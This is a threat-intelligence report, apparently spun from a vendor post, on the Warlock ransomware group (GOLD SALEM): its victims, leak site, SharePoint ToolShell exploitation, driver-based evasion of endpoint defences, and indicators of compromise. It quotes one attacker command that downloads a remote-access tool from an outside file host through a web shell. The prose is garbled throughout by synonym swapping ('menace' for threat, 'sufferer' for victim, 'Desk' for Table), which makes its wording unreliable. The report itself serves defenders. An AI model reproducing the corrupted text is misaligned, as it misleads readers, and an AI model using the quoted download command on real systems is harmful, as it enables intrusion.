Counter Menace Unit™ (CTU) researchers are monitoring a menace group that refers to itself as Warlock Group. The group, which CTU™ researchers monitor as GOLD SALEM, has compromised networks and deployed its Warlock ransomware since March 2025. Microsoft refers to this menace group as Storm-2603 and characterizes it “with average confidence to be a China-based menace actor,” however CTU researchers have inadequate proof to corroborate this attribution.
Victimology and on-line exercise
The group’s 60 revealed victims by means of mid-September 2025 rank it within the center when in comparison with different ransomware operations throughout the identical interval. GOLD SALEM’s victims have ranged from small industrial or authorities entities to giant multinational firms unfold all through North America, Europe, and South America. Like most ransomware teams, GOLD SALEM has largely averted compromising organizations situated in China and Russia regardless of the big pool of potential targets. Nevertheless, the group posted the title of a Russia-based sufferer to its devoted leak web site (DLS) on September 8. The industrial entity gives engineering companies and tools to the electrical energy era trade. Regardless of harboring a big contingent of worldwide ransomware distributors, the Russian Federation is understood to aggressively pursue teams that assault organizations in Russia and its “near-abroad” neighbors. GOLD SALEM’s itemizing of a Russian sufferer means that the group might function from exterior of this jurisdiction.
GOLD SALEM had no public footprint till a June 2025 RAMP underground discussion board put up by a persona representing the group solicited exploits for widespread enterprise functions (e.g., Veeam, ESXi, SharePoint) and instruments to kill endpoint detection and response (EDR) techniques and different safety merchandise. A subsequent put up sought cooperation from preliminary entry brokers (IABs) in offering potential victims. It’s unclear if the group was looking for entry to hold out their very own intrusions, recruiting associates for a nascent ransomware-as-a-service (RaaS) operation, or each.
GOLD SALEM operates a Tor-based DLS to publish purported sufferer names and information stolen from these victims (see Determine 1). As of September 16, information from 19 of 60 listed victims (32%) was revealed on the DLS. Moreover, the menace actors declare to have bought information from 27 (45%) of the victims to personal patrons, doubtlessly in response to ransom nonpayment. Cybercriminal teams are recognized to often promote stolen information to 3rd events, however the figures revealed by GOLD SALEM are seemingly embellished or fabricated. Three sufferer names beforehand listed on the DLS had been subsequently eliminated.
Determine 1: GOLD SALEM leak web site as of September 16, 2025
GOLD SALEM has posted the names of victims compromised by totally different ransomware operations. Whereas an rare prevalence, these posts can characterize IABs promoting entry to a number of menace actors, associates posting stolen information to a number of ransomware leak websites, or a sufferer’s failure to successfully remediate widespread preliminary entry vectors resulting in repeated compromises. For instance, a U.S.-based industrial development contractor allegedly breached in early June 2025 had beforehand been victimized by GOLD CRESCENT’s Hunters Worldwide ransomware in October 2024 and by Payout Kings in June 2025.
Information revealed by GOLD SALEM and metadata extracted from their DLS recommend that the group started attacking and extorting victims in March 2025. A June 10 put up to the RAMP discussion board introduced Warlock and included a hyperlink to the primary iteration of a Tor-based DLS. The Tor tackle was disconnected June 11, and a brand new web site didn’t emerge till late July. GOLD SALEM tends to put up to the DLS in batches, leading to victims showing a number of days to a number of weeks after the precise compromise. Every sufferer is assigned a “countdown” date indicating the deadline for paying the ransom (see Determine 2). This date is usually 12-14 days after the sufferer seems on the DLS.
Determine 2: Countdown dates listed on GOLD SALEM’s DLS as of September 16, 2025
Noticed incidents
In late July, CTU researchers analyzed an incident by which GOLD SALEM used the ToolShell exploit chain in opposition to SharePoint servers for preliminary entry. This exploit chain depends on utilizing a mix of vulnerabilities CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771. Exploitation resulted within the placement of an ASPX internet shell that created a Course of object for cmd.exe throughout the context of the IIS employee course of (w3wp.exe). The attacker might then remotely execute arbitrary instructions and have any ensuing output proven to them. CTU researchers noticed the next command issued by means of this internet shell:
curl -L -o c:customerspublicSophosSophos-UI.exe hxxps[:]//filebin[.]web/j7jqfnh8tn4alzsr/wsocks.exe.txt
The downloaded executable was a Golang-based WebSockets server that allowed continued entry to the compromised server independently of the online shell. CTU researchers additionally noticed GOLD SALEM bypass EDR through the use of the Deliver Your Personal Susceptible Driver (BYOVD) approach and a susceptible Baidu Antivirus driver renamed googleApiUtil64.sys to terminate the EDR agent. A flaw on this driver (CVE-2024-51324) permits for arbitrary processes to be terminated.
Microsoft’s profile of the group famous the execution of Mimikatz “particularly concentrating on the Native Safety Authority Subsystem Service (LSASS) reminiscence to extract plaintext credentials.” Microsoft additionally noticed the usage of PsExec and Impacket for lateral motion and the usage of Group Coverage Objects (GPO) to deploy the Warlock payload.
In August, CTU researchers noticed GOLD SALEM abusing the reliable open-source Velociraptor digital forensics and incident response (DFIR) device to ascertain a Visible Studio Code community tunnel throughout the compromised atmosphere. A few of these incidents led to Warlock ransomware deployment.
Mitigations and detections
Organizations ought to implement common assault floor monitoring and have aggressive patching insurance policies for internet-facing companies. Detection and mitigation of zero-day exploitation require proactive endpoint monitoring and well timed incident response.
The next Sophos protections detect exercise associated to this menace:
- Troj/WebShel-F
- Troj/Warlock-B
To mitigate publicity to this menace, CTU researchers suggest that clients use out there controls to evaluate and prohibit entry utilizing the indications listed in Desk 1.
| Indicator | Kind | Context |
| bfbeac96a385b1e5643ec0752b132506 | MD5 hash | ASPX internet shell utilized by GOLD SALEM after SharePoint ToolShell exploitation |
| de25be0afd53a1d274eec02e5303622fc8e7dbd5 | SHA1 hash | ASPX internet shell utilized by GOLD SALEM after SharePoint ToolShell exploitation |
| 996c7bcec3c12c3462220fc2c19d61ccc039005ef5e7c8fabc0b34631a31abb1 | SHA256 hash | ASPX internet shell utilized by GOLD SALEM after SharePoint ToolShell exploitation |
| b3a099ecca79503a0e4a154bd85d3e6b | MD5 hash | WebSockets distant entry device utilized by GOLD SALEM (wsocks.exe.txt) |
| 6d0cc6349a951f0b52394ad3436d1656ec5fba6a | SHA1 hash | WebSockets distant entry device utilized by GOLD SALEM (wsocks.exe.txt) |
| a204a48496b54bcb7ae171ad435997b92eb746b5718f166b3515736ee34a65b4 | SHA256 hash | WebSockets distant entry device utilized by GOLD SALEM (wsocks.exe.txt) |
Desk 1: Indicators for this menace
